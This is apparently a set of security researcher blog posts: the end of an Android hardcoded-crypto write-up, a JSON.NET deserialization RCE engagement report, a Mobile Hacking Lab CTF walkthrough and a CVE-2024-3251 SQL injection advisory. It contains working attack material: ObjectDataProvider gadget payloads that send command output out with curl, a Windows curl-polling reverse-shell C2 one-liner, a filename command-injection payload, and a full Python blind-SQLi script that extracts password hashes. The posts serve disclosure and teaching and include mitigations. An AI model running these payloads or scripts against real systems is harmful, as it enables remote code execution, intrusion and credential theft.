password = SECRET_STR.encode()
salt     = base64.b64decode(SALT_B64)
key      = hashlib.pbkdf2_hmac('sha1', password, salt, ITERATIONS, KEY_LEN)

iv         = base64.b64decode(IV_B64)
ciphertext = base64.b64decode(args.blob)
plaintext  = unpad(AES.new(key, AES.MODE_CBC, iv).decrypt(ciphertext), 16)

print("[+] Decrypted value:")
print(plaintext.decode("utf-8", errors="replace"))

Running the exploit is pretty straight forward. We can setup a virtual environment:

python3 -m venv venv
source venv/bin/activate

Now we can install dependencies

pip install pycryptodome

And finally, we run the script:

python3 poc.py --blob "aoZw+lyPI9gjZ/Emgq3FERZPf2qdOJTKP27jpAaVMsezaA1P8dwE9I42q9ZMmUUR"

We get the plaintext email and password of the user:

Recommendations

This vulnerability stems from fundamental cryptographic misuses, primarily the hardcoding of encryption materials and the lack of authenticated encryption. To prevent this class of issue, developers should adopt modern cryptographic practices aligned with OWASP MASVS.

The client implemented a fix that was solid!

Key Management

• Never hardcode keys, salts, or IVs in code or resources.
• Use the Android Keystore (KeyGenParameterSpec) to securely generate and store per-device keys.
• Tie key usage to biometric authentication (setUserAuthenticationRequired(true)).

IV and Salt Handling

• Always generate a random IV for each encryption operation using a secure RNG.
• Salts for KDFs must be unique per user or device, and stored alongside the encrypted blob (not hardcoded).

Encryption Mode

• Avoid AES-CBC unless absolutely necessary.
• Prefer authenticated encryption modes like AES-GCM or ChaCha20-Poly1305 which provide confidentiality and integrity out of the box.

Align with MASVS

Make sure you meet the following MASVS requirements:

• MASVS-STORAGE-2: All sensitive data is encrypted using a secure, platform-provided API.
• MASVS-CRYPTO-1: The app uses strong, industry-standard algorithms.
• MASVS-CRYPTO-4: Keys and IVs are generated securely and never hardcoded.

Conclusion

This vulnerability demonstrate how insecure cryptographic implementation can entirely defeat the security promises of biometric authentication. Despite the UI implying strong protection, the design leaked sensitive credentials and allowed full authentication bypass through nothing more than static analysis and a few lines of Python.

Modern mobile apps must assume full adversary access to the APK and local storage. If your encryption can be replicated outside the app, it’s already broken.

In modern .NET applications, JSON is the de facto standard for data exchange between client and server. Libraries like JSON.NET (Newtonsoft.Json) make serialization and deserialization seamless—but with convenience often comes risk. When developers unknowingly expose deserialization functionality to untrusted input, it opens the door to devastating consequences.

This blog post cover a critical vulnerability found during one of my engagement: Remote Code Execution (RCE) via insecure JSON.NET deserialization. Unlike common injection flaws, this class of vulnerability happens from subtle trust assumptions in object construction, and when exploited correctly, allows an attacker to gain arbitrary code execution on the target system.

Let’s go!

“To demonstrate the exploitation technique without exposing any client-sensitive infrastructure, identifiable hostnames and token values have been redacted or replaced with placeholders.”

Discovery of Deserialization Sink

During initial recon, I’ve came across an unauthenticated API endpoint accepting POST requests with JSON payloads. The endpoint behavior suggested server-side processing of arbitrary JSON structures. A closer inspection of responses and error messages hinted at usage of the JSON.NET library with dangerous settings that allowed attacker controlled input to influence type resolution.

I began testing with various payloads containing the $type field, which JSON.NET uses to resolve and instantiate .NET types dynamically. The application accepted these values and attempted to resolve the corresponding types which is a strong evidence that TypeNameHandling was enabled server-side.

This was definitely an insecure deserialization sink. An attacker-controlled JSON, dynamic type resolution, and no authentication barrier!

This vulnerability is not limited to the specific access point tested. Any part of the application that accepts a JSON body in a POST request and processes it using the vulnerable deserialization logic could be exploited in the same way. This considerably widens the attack surface, making the entire application susceptible to exploitation if appropriate validation measures are not implemented.

From Type Confusion to Code Execution

JSON.NET supports polymorphic deserialization using the $type field, which allows the incoming JSON to specify the concrete type to instantiate. While useful for legitimate polymorphic models, it’s inherently dangerous when exposed to untrusted input.

I exploited this by leveraging a gadget class in the .NET Framework: System.Windows.Data.ObjectDataProvider. This class, when deserialized, can invoke arbitrary methods and effectively becomes a deserialization-based method dispatcher.

Combined with System.Diagnostics.Process, I crafted a payload that executes system commands on the server and sent it via a POST request:

POST /[REDACTED]/[REDACTED]/Login/Login HTTP/2
Host: REDACTED
[…]

{
  "$type": "System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
  "MethodName": "Start",
  "MethodParameters": {
    "$type": "System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
    "$values": ["cmd", "/c dir | curl -X POST --data-binary @- http://my_burp_collaborator"]
  },
  "ObjectInstance": {
    "$type": "System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"
  }
}

Payload Breakdown:

• $type – Tells JSON.NET to instantiate an ObjectDataProvider, a gadget capable to invoke methods.
• MethodName – Invokes the Start method on the supplied ObjectInstance.
• MethodParameters – Passes cmd and a shell command to Start.
• ObjectInstance – The actual System.Diagnostics.Process object, which executes the command.

When deserialized, the application launched a shell, ran the dir command, and exfiltrated the output via curl to my Burp collaborator.

The server returned an error…

HTTP/2 500 Internal Server Error
[…]

[…]
Cannot apply indexing with [] to an expression of type
'System.Windows.Data.ObjectDataProvider'.
[…]

But still receive the content of c:\windows\system32\inetsrv dir on my Burp collaborator and this confirmed full remote code execution.

After I confirmed the application was deserializing untrusted JSON with type resolution enabled, I incrementally escalated the attack from simple command execution to full remote shell access. Below is a breakdown of each stage.

Environment Fingerprinting

I gathered system-level intelligence to understand the target environment. Using the systeminfo command, I retrieved OS version, installed patches, system architecture, and domain information. This step helped to determine exploit feasibility and privilege context.

POST /[REDACTED]/[REDACTED]/Login/Login HTTP/2
Host: REDACTED
[…]

{
  "$type": "System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
  "MethodName": "Start",
  "MethodParameters": {
    "$type": "System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
    "$values": ["cmd", "/c systeminfo | curl -X POST --data-binary @- http://my_burp_collaborator"]
  },
  "ObjectInstance": {
    "$type": "System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"
  }
}

File Upload Attempts

I attempted to write several reverse shell payloads directly to the file system using chained shell commands and echo redirection. While the files were successfully written, execution failed likely due to permission restrictions and a very sensitive AV ☹️.

Full Remote Shell

After reworking my approach, I achieved stable remote code execution via a Windows one-liner reverse shell. The payload used curl in a polling loop to communicate with an external server, fetch commands, execute them locally, and exfiltrate the results. This technique avoided spawning an interactive shell, favoring a covert C2-like protocol over HTTPS.

@echo off
& cmd /V:ON /C (
    SET ip=REDACTED:443
    && SET sid="Authorization: eb6a44aa-8acc1e56-629ea455"
    && SET protocol=https://
    && curl !protocol!!ip!/eb6a44aa -H !sid! > NUL
    && for /L %i in (0) do (
        curl -s !protocol!!ip!/8acc1e56 -H !sid! > !temp!cmd.bat
        & type !temp!cmd.bat | findstr None > NUL
        & if errorlevel 1 (
            (!temp!cmd.bat > !tmp!out.txt 2>&1)
            & curl !protocol!!ip!/629ea455 -X POST -H !sid! --data-binary @!temp!out.txt > NUL
        )
        & timeout 1
    )
) > NUL

This command established a functional command-and-control loop, giving me full execution capability on the target machine without opening an inbound listener.

POST /[REDACTED]/[REDACTED]/Login/Login HTTP/2
Host: REDACTED
[…]

{
  "$type": "System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
  "MethodName": "Start",
  "MethodParameters": {
    "$type": "System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
    "$values": ["cmd", "/c@echo off&cmd /V:ON /C "SET ip=1REDACTED:443&&SET sid=\"Authorization: eb6a44aa-8acc1e56-629ea455\"&&SET protocol=https://&&curl !protocol!!ip!/eb6a44aa -H !sid! > NUL && for /L %i in (0) do (curl -s !protocol!!ip!/8acc1e56 -H !sid! > !temp!cmd.bat & type !temp!cmd.bat | findstr None > NUL & if errorlevel 1 ((!temp!cmd.bat > !tmp!out.txt 2>&1) & curl !protocol!!ip!/629ea455 -X POST -H !sid! --data-binary @!temp!out.txt > NUL)) & timeout 1" > NUL"]
  },
  "ObjectInstance": {
    "$type": "System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"
  }
}

Connection received:

Recommendations

To prevent exploitation scenarios like the one described in this article, teams should adopt a secure-by-default approach to deserialization. Below are practical, technical mitigations:

Defensive Coding Practices

• Disable TypeNameHandling globally in JSON.NET unless there’s a legitimate business case. If required, avoid TypeNameHandling.All; prefer None.
• Implement a custom SerializationBinder to strictly control which types can be deserialized. Whitelisting is critical.

new JsonSerializerSettings {
    TypeNameHandling = TypeNameHandling.Objects,
    SerializationBinder = new SafeTypeBinder() // implement whitelisting
}

• Never deserialize user input directly. Isolate or pre-validate untrusted data before passing it into any deserialization logic.
• Treat deserialization as dangerous by default, especially if the source is not authenticated or signed.

Operational Security Measures

• Use runtime application self-protection (RASP) or EDR tools to monitor process launches from application servers.
• Apply strict egress filtering. Block outbound connections from app servers unless explicitly required.
• Harden the runtime. Run .NET apps with constrained privileges. Avoid running under SYSTEM or administrative contexts.

Conclusion

This vulnerability is a great example of how power features in mature libraries like JSON.NET’s polymorphic deserialization can become liabilities when used without a security first mindset. The exploit path from anonymous POST request to remote code execution was short, silent, and could cause serious impact.

Serialization is not just data handling, it’s executable logic. Treat it with the same caution as SQL or shell commands. At least mitigation is not complex and defaults like TypeNameHandling.All should be treated as dangerous.

Thank you for reading 🙂

Android Services Vulnerabilities: A Mobile Hacking Lab CTF Challenge

I got super excited when I saw Mobile Hacking Lab post a new challenge on their platform. I enrolled in the lab immediately and read the instructions and solved it. I didn’t have much time to create the walkthrough but better late than never I guess.

Android Services are components of the Android operating system that perform long-running operations in the background without a user interface. They’re designed to handle operations or perform tasks that should continue even if the user switches to another application. Services can run in the background (background services), work for remote processes (bound services), or execute a specific job that doesn’t require user interaction and stops itself when its task is complete (intent services).

You can access the challenge here: Mobile Hacking Lab - Cyclic Scanner

The Challenge Overview

The objective of this lab is pretty straight forward. Exploit a vulnerability inherent within an Android virus scanner Service to achieve remote code execution (RCE). Let’s boot the application and start the discovery phase.

Discovery Phase

The application is very minimal. There’s a button to turn On or Off the scanner:

We can’t stop the scanner when it’s running. I decided to run pidcat to see what was going on…

System.out:
  I  starting file scan...
  I  /storage/emulated/0/Music/.thumbnails/.database_uuid...SAFE
  I  /storage/emulated/0/Music/.thumbnails/.nomedia...SAFE
  I  /storage/emulated/0/Pictures/.thumbnails/.database_uuid...SAFE
  I  /storage/emulated/0/Pictures/.thumbnails/.nomedia...SAFE
  I  /storage/emulated/0/Movies/.thumbnails/.database_uuid...SAFE
  I  /storage/emulated/0/Movies/.thumbnails/.nomedia...SAFE
  I  finished file scan!

We can see that it’s scanning specific path and mark them as SAFE when no malicious file is detected.

Let’s go through the code with jadx-gui

Code Analysis

The first stop is the ScanEngine class. Let’s go over the interesting bit…

ScanEngine

Constructing the Command

The method constructs a command string to compute the SHA-1 checksum of the file using toybox sha1sum. This command will be executed in a shell, it should be our entry point for RCE. We’ll come back to this later. If you want to jump to the RCE, go straight to the Exploitation section of this article.

    try {
        String command = "toybox sha1sum " + file.getAbsolutePath();

Creating and Starting the Process

A ProcessBuilder is used to create and start a new process that runs the command. The process is configured to use the external storage directory as its working directory and to redirect error streams to the standard output.

        Process process = new ProcessBuilder(new String[0])
            .command("sh", "-c", command)
            .directory(Environment.getExternalStorageDirectory())
            .redirectErrorStream(true)
            .start();

Reading the Process Output

The method retrieves the input stream of the process to read its output. An InputStreamReader wrapped in a BufferedReader is used for read and process text data from a byte stream.

        InputStream inputStream = process.getInputStream();
        Intrinsics.checkNotNullExpressionValue(inputStream, "getInputStream(...)");
        
        Reader inputStreamReader = new InputStreamReader(inputStream, Charsets.UTF_8);
        BufferedReader bufferedReader = inputStreamReader instanceof BufferedReader ? 
            (BufferedReader) inputStreamReader : 
            new BufferedReader(inputStreamReader, 8192);

Processing the Command Output

The method reads the first line of the command’s output, which contains the SHA-1 hash of the file and extracts the hash from the output.

        try {
            String output = bufferedReader.readLine();
            Intrinsics.checkNotNull(output);
            
            Object fileHash = StringsKt.substringBefore$default(output, "  ", (String) null, 2, (Object) null);
            Unit unit = Unit.INSTANCE;

Checking Against Known Malware Samples

The extracted SHA-1 hash is checked against a known list of malware samples (ScanEngine.KNOWN_MALWARE_SAMPLES). If the hash is found in the list, the file is considered unsafe, and the method returns false. Otherwise, it returns true.

            return !ScanEngine.KNOWN_MALWARE_SAMPLES.containsValue(fileHash);
        } finally {
        }
    } catch (Exception e) {
        e.printStackTrace();
        return false;
    }
}

Now since the method check whether a given file is safe or malicious against a list of known hashes, we have to know which known hash exist. We can see those hashes in the static final HashMap

Let’s check the Known Malware Samples…

Defining Known Malware Samples

This static final HashMap named KNOWN_MALWARE_SAMPLES map stores pairs of file names and their corresponding SHA-1 hashes. The MapsKt.hashMapOf function is used to create the map, and TuplesKt.to is used to create the key-value pairs and their corresponding hashes.

If a file contains a name and hash from the list, it will be flag as INFECTED

private static final HashMap<String, String> KNOWN_MALWARE_SAMPLES = MapsKt.hashMapOf(
    TuplesKt.to("eicar.com", "3395856ce81f2b7382dee72602f798b642f14140"),
    TuplesKt.to("eicar.com.txt", "3395856ce81f2b7382dee72602f798b642f14140"),
    TuplesKt.to("eicar_com.zip", "d27265074c9eac2e2122ed69294dbc4d7cce9141"),
    TuplesKt.to("eicarcom2.zip", "bec1b52d350d721c7e22a6d4bb0a92909893a3ae")
);

Why INFECTED? we can see in the code below (took from the ScanService Class)

ScanEngine

                System.out.print((Object) (file.getAbsolutePath() + "..."));
                boolean safe = ScanEngine.INSTANCE.scanFile(file);
                System.out.println((Object) (safe ? "SAFE" : "INFECTED"));
            }
        }

The method print the file’s absolute path and then uses ScanEngine.INSTANCE.scanFile(file) to scan the file. It prints SAFE if the file is safe (as seen in the pidcat output!) and INFECTED if it is not.

Exploitation

Let’s start with adding a file called eicar.txt containing the eicard string and monitor the log using pidcat. If things go according to plans, we should see the INFECTED displayed in the logs.

eicar string: X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

As expected, we can see INFECTED with the full path of the file:

How can we achieve RCE ?

Now this is fairly simple, let’s go over the code again from the ScanEngine class:

String command = "toybox sha1sum " + file.getAbsolutePath();
Process process = new ProcessBuilder(new String[0])
    .command("sh", "-c", command)
    .directory(Environment.getExternalStorageDirectory())
    .redirectErrorStream(true)
    .start();
InputStream inputStream = process.getInputStream();

The command string is dynamically constructed by concatenating "toybox sha1sum " with file.getAbsolutePath(). This allows any value returned by file.getAbsolutePath() to be included directly in the command string…

If file.getAbsolutePath() returns a path that contains shell metacharacters (;, &&, |), it can change the intended command execution (toybox sha1sum).

The ProcessBuilder is set to run the command in a shell (sh -c). The shell interprets and executes the command string, allowing shell metacharacters to be processed… which turns into a command injection!

It’s a matter of how we can name the file…

If the file path includes "; malicious command", the command will be split and execute both toybox sha1sum and malicious command just like a traditional operator.

Let’s create an empty txt file and our payload will be in the filename:

; echo 'RCE PoC from almightysec!!' > almightysec.txt #

The ; allows injection of the payload: echo 'RCE PoC from almightysec!!' > almightysec.txt, which creates a file with the content we echo. I added # to make sure trailing commands interfere.

Let’s run it!

We push the file on the device in /sdcard/Download since that’s where the scanner looks for malicious files.

adb push \;\ id\ \&\ echo\ \'RCE\ PoC\ from\ almightysec\!\!\'\ \>\ almightysec.txt\ \# /sdcard/Download/

Our file is now located in /sdcard/Download:

We can monitor the logs using pidcat and we can see that our file is now marked as SAFE. We can also see that the exploit worked because the malicious file almightysec.txt exist in /storage/emulated/0/!

We can confirm the content of the file by getting a shell on the device:

Conclusion

Another exciting challenge conquered at Mobile Hacking Lab!

The “Cyclic Scanner” centered on an Android virus scanner service with a critical flaw that allowed remote code execution (RCE). Imagine the implications of an attacker gaining such control over your device…

Just looking at the service’s behavior and understanding the code, we crafted a specific payload to exploit the dynamically constructed command strings. Never trust user input!!

Let’s move on to the next challenge!

Thank you, Mobile Hacking Lab! 😊

Summary

• CVE ID: CVE-2024-3251
• Vendor: Sourcecodester
• Product: Computer Laboratory Management System
• Product Link: Product
• Affected Versions: v1.0
• Fixed in Version: Not Fixed
• Vulnerability Type: Time-Based Blind SQL Injection
• Severity: Critical
• Researchers: Simon Bertrand (Almightysec)
• Disclosure Date: 04/01/2024

Vulnerability Description

An SQL Injection vulnerability has been identified in the /view_borrow function via the id parameter of Sourcecodester Computer Laboratory Management System affecting version 1.0 The vulnerability arises due to insufficient input validation and sanitation of user-supplied data in the /view_borrow function. An attacker can exploit this vulnerability to execute arbitrary SQL commands in the application’s backend database, leading to unauthorized access, data exfiltration, or database corruption.

Affected Components

The SQL injection vulnerability affects the view_borrow function, specifically through the id parameter in the URL path. This component is part of the administrative backend of the Computer Laboratory Management System, intended for managing borrowing records.

• URL Path: /admin/?page=borrow/view_borrow&id=
• Parameter: id
• Function: view_borrow
• Location: Administrative backend, under the Borrows management section.

This vulnerability is present in the application’s handling of dynamic SQL queries without proper validation or sanitation of user-supplied input. As a result, an attacker can manipulate the id parameter to inject arbitrary SQL commands, potentially leading to unauthorized access, data exfiltration, or manipulation of the database.

The issue arises within the web application’s server-side processing of the URL parameter. It does not properly sanitize input before incorporating it into SQL queries that are executed against the backend database. This oversight makes it possible to execute unintended SQL commands, affecting the database’s integrity and confidentiality.

Steps to Reproduce

Follow these steps to reproduce the vulnerability. Please use this section responsibly, ensuring that only authorized individuals can perform these actions in a safe and legal environment.

1. Environment Setup:
   • Download the .zip file from Sourcecodester: Computer Laboratory Management System
   • Follow installation instruction from Sourcecodester
2. Initial Conditions:
   • From the Administration panel, create a low priv user.
   • Log out from the Administrator account
   • Login as low priv user.
3. Reproduction Steps:
   • Step 1: Click on Borrows tab
   • Step 2: Click on View
   • Step 3: Capture request and send to Repeater.
   • Step 4: Test with sleep payload '+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))exploit)--+

POC:

GET /php-lms/admin/?page=borrow/view_borrow&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))exploit)--+ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-CA,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: http://localhost/php-lms/admin/?page=borrow
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Connection: close

Exploit Code:

import requests
import sys
import time

class Colors:
    HEADER = '\033[95m'
    OKBLUE = '\033[94m'
    OKGREEN = '\033[92m'
    WARNING = '\033[93m'
    FAIL = '\033[91m'
    ENDC = '\033[0m'
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'

def banner():
    print(f"{Colors.HEADER}SQL injection in LMS-PHP v1.0{Colors.ENDC}")
    print(f"{Colors.OKBLUE}---------------------------------{Colors.ENDC}\n")

def print_help():
    print("Usage: python exploit.py <URL>")
    print("Example: python exploit.py http://example.com")
    sys.exit(1)

def check_condition(url, session, condition):
    injected_url = f"{url}'+AND+IF({condition},SLEEP(5),0)--+"
    start_time = time.time()
    session.get(injected_url)
    response_time = time.time() - start_time
    return response_time >= 5

def extract_char_at_pos(url, session, pos):
    low = 32
    high = 126
    while low <= high:
        mid = (low + high) // 2
        condition = f"ascii(substring((SELECT password FROM lms_db.users WHERE id=1 LIMIT 1),{pos},1))>{mid}"
        if check_condition(url, session, condition):
            low = mid + 1
        else:
            high = mid - 1
    return chr(low)

def extract_data(url):
    session = requests.Session()
    extracted = ""
    for pos in range(1, 33):
        extracted += extract_char_at_pos(url, session, pos)
        print(f"{Colors.OKGREEN}Extracted so far: {extracted}{Colors.ENDC}")
    print(f"{Colors.OKGREEN}Full extracted data: {extracted}{Colors.ENDC}")

def main():
    banner()
    if len(sys.argv) != 2 or sys.argv[1] in ['-h', '--help']:
        print_help()

    url = sys.argv[1] + "/php-lms/admin/?page=borrow/view_borrow&id=1"
    extract_data(url)

if __name__ == "__main__":
    main()

Impact Analysis

The identified SQL Injection vulnerability within the Computer Laboratory Management System poses significant risks that could lead to severe impacts on confidentiality, integrity, and availability of the system and its data. Specifically:

• Data Exposure: Confidential data, including student records, administrative information, and potentially sensitive personal data, could be extracted by unauthorized parties. This exposure risks privacy breaches and regulatory non-compliance.
• Unauthorized Access: Attackers might gain unauthorized access to other parts of the system or escalate their privileges, allowing them to alter system configurations, manipulate data, or disrupt operational integrity.
• Service Disruption: By exploiting this vulnerability, attackers could render the system unstable or entirely unavailable, affecting the day-to-day operations of the computer laboratory management.
• Reputational Damage: Incidents arising from this vulnerability could erode trust among stakeholders, including students, faculty, and administration, potentially leading to a decline in system usage and confidence in the institution’s cybersecurity posture.

Mitigation and Recommendations

To mitigate the identified vulnerability and reduce potential impacts, the following steps are recommended:

• Immediate Patching: If the vendor releases a patch, apply it immediately. Given the absence of a fix, consider the following temporary measures.
• Input Validation: Implement rigorous input validation checks to ensure only expected data types and formats are processed. Use allowlists for allowable characters in inputs.
• Prepared Statements: Transition to using prepared statements with parameterized queries in all database interactions to effectively neutralize SQL Injection attacks.
• Error Handling: Customize error messages to avoid revealing details about the database structure or pointing to existing vulnerabilities.
• Regular Auditing: Conduct regular security audits and vulnerability assessments of the system to identify and mitigate potential vulnerabilities proactively.
• Security Awareness: Enhance security awareness among developers and administrators regarding common vulnerabilities and secure coding practices.

Vendor Communication

Detail the timeline of communication with the vendor, including when the vulnerability was reported, any responses received, and the current status of the vulnerability.

• Reported On: 04/01/2024 - The vulnerability was reported
• Acknowledged On: N/A - As of the last update, the vendor has not acknowledged the report.
• Fixed On: N/A - A fix for the vulnerability has not been issued.
• CVE Assigned On: 04/03/2024 - CVE assigned: CVE-2024-3251

Efforts to follow up with the vendor will continue, and updates will be provided as new information becomes available.

References

External references and advisories directly related to this specific vulnerability in the Computer Laboratory Management System. The following are general resources on SQL Injection prevention techniques, best practices and links to the CVE:

1. CVE Mitre: Link
2. NIST: Link
3. CVE Details: link
4. Vuldb: Link
5. OWASP SQL Injection Prevention Cheat Sheet: Link
6. OWASP Guide to SQL Injection: Link

This section will be updated as the vendor provides feedback or releases patches.

Acknowledgments

Special thanks to the cybersecurity and open-source communities for their invaluable tools and resources that support vulnerability research. Appreciation is extended to colleagues and peers for their insights and feedback during the vulnerability analysis process.

This report is provided “as is” for informational purposes only. The authors do not take any responsibility for misuse of this information. Researchers and testers should conduct their activities with respect to applicable laws and guidelines for ethical hacking.